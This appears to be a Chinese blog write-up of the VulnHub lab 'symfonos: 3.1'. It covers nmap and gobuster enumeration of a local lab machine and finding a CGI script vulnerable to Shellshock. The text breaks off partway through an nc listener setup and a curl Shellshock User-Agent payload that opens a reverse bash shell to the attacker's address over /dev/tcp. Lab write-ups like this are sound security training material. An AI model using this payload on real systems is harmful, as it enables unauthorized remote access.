您当前的位置: 首页 > 

仙女象

暂无认证

  • 0浏览

    0关注

    136博文

    0收益

  • 0浏览

    0点赞

    0打赏

    0留言

私信
关注
热门博文

vulnhub symfonos: 3.1

仙女象 发布时间:2022-04-14 22:07:57 ,浏览量:0

渗透思路:

nmap扫描----gobuster扫描网站目录----shellshock获得反弹shell----pspy发现定时ftp连接----tcpdump获取用户密码----vi修改python脚本获得root权限反弹shell

环境信息:

靶机:192.168.101.56

攻击机:192.168.101.34

具体步骤: 1、nmap扫描
sudo nmap -sV -sC -p- 192.168.101.56

扫描到21端口(ftp)、22端口(ssh)和80端口(http)

2、gobuster扫描网站目录(不小心进入兔子洞)

浏览器访问http://192.168.101.56/,发现只是一张图片

gobuster扫描网站目录,字典用/usr/share/wordlists/dirb/big.txt

​gobuster dir -u http://192.168.101.56/ -w /usr/share/wordlists/dirb/big.txt

扫到一个/gate目录可能有点东西

浏览器访问http://192.168.101.56/gate/,又是一张图

继续gobuster扫描http://192.168.101.56/gate/,换个字典/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

​gobuster dir -u http://192.168.101.56/gate/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

扫描到/cerberus

浏览器访问http://192.168.101.56/gate/cerberus/,又是一张图

继续gobuster扫描,换回原来的字典/usr/share/wordlists/dirb/big.txt

​gobuster dir -u http://192.168.101.56/gate/cerberus/ -w /usr/share/wordlists/dirb/big.txt

扫描到/tartarus

浏览器访问http://192.168.101.56/gate/cerberus/tartarus/,还是一张图,右键查看元素的时候,发现有注释"The underworld can be cruel... but it can also be misleading. ",emmmmm不知道是不是在暗示这里是兔子洞……

继续扫描目录,用字典/usr/share/wordlists/dirb/big.txt

​gobuster dir -u http://192.168.101.56/gate/cerberus/tartarus -w /usr/share/wordlists/dirb/big.txt

这次大丰收,扫到了/research、/hermes和/charon,但其实只有/research可以访问

浏览器访问http://192.168.101.56/gate/cerberus/tartarus/research发现都是文字,也没注释,也没功能,也没啥敏感信息,再往下扫描目录也扫描不出东西了,似乎真是兔子洞……

3、shellshock获得反弹shell

回到最初的起点,一开始扫描http://192.168.101.56/的时候还扫描到了/cgi-bin,接下来扫描一下这个目录,用字典/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

​gobuster dir -u http://192.168.101.56/cgi-bin/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

扫描到了/underworld

浏览器访问http://192.168.101.56/cgi-bin/underworld

再访问一次,发现显示的结果有变化,似乎是实时更新的,并且看起来像是命令行的执行结果

在百度中查找users,load average,找到的结果显示浏览器上的显示可能是命令w或者uptime的结果

在攻击机上尝试执行w,发现比浏览器显示多一些行

攻击机上执行uptime,输出结果的格式和浏览器显示是一致的。

既然http://192.168.101.56/cgi-bin/underworld执行系统命令,那它有可能会有shellshock漏洞(参考资料:什么是ShellShock攻击? - 知乎),尝试一下:

攻击机上开两个终端,一个nc监听6666端口

nc -nlvp 6666

另一个输入

​curl -A "() { :;};/bin/bash -i &>/dev/tcp/192.168.101.34/6666             
关注
打赏
1661867686
查看更多评论
0.0860s